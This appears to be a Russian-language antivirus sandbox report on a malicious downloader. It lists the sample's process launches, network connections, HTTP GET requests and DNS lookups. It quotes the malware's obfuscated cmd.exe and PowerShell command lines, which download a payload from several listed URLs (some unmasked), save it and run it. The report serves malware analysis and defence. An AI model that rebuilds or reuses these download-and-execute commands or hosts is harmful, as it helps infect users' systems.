Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:O/C"set SNT= }}{hctac}}kaerb;Uar$ ssecorP-tratS;)Uar$(elifotevas.wvt$;)ydoBesnopser.QjY$(etirw.wvt$;1 = epyt.wvt$;)(nepo.wvt${ )'*ZM*' ekil- txetesnopse...
Сетевая активность
Подключается к
- 'vi######ratatraining.com':80
- 'ek#####truction.com.au':80
- 'au#####tsnetwork.com.ua':80
- 'av#####bor-barnaul.ru':80
TCP
Запросы HTTP GET
- http://vi######ratatraining.com/w8INn1Y
- http://ek#####truction.com.au/yscziIK
- http://au#####tsnetwork.com.ua/t9
- http://av#####bor-barnaul.ru/Y
UDP
- DNS ASK an#####avis-ew.me.uk
- DNS ASK vi######ratatraining.com
- DNS ASK ek#####truction.com.au
- DNS ASK au#####tsnetwork.com.ua
- DNS ASK av#####bor-barnaul.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:O/C"set SNT= }}{hctac}}kaerb;Uar$ ssecorP-tratS;)Uar$(elifotevas.wvt$;)ydoBesnopser.QjY$(etirw.wvt$;1 = epyt.wvt$;)(nepo.wvt${ )'*ZM*' ekil- txetesnopse...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set SNT= }}{hctac}}kaerb;Uar$ ssecorP-tratS;)Uar$(elifotevas.wvt$;)ydoBesnopser.QjY$(etirw.wvt$;1 = epyt.wvt$;)(nepo.wvt${ )'*ZM*' ekil- txetesnopser.QjY$( fI;)(dnes.QjY$...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $ELj='AVa';$NLL='http://an#####avis-ew.me.uk/4W@http://vitaliberatatraining.com/w8INn1Y@http://ekcconstruction.com.au/yscziIK@http://autopartsnetwork.com.ua/t9@http://...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=.7XGv tokens=2" %u IN ('assoc^|findstr 1x') DO %u -"
- '<SYSTEM32>\cmd.exe' /c assoc|findstr 1x
- '<SYSTEM32>\cmd.exe' /S /D /c" assoc"
- '<SYSTEM32>\findstr.exe' 1x
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =AVa
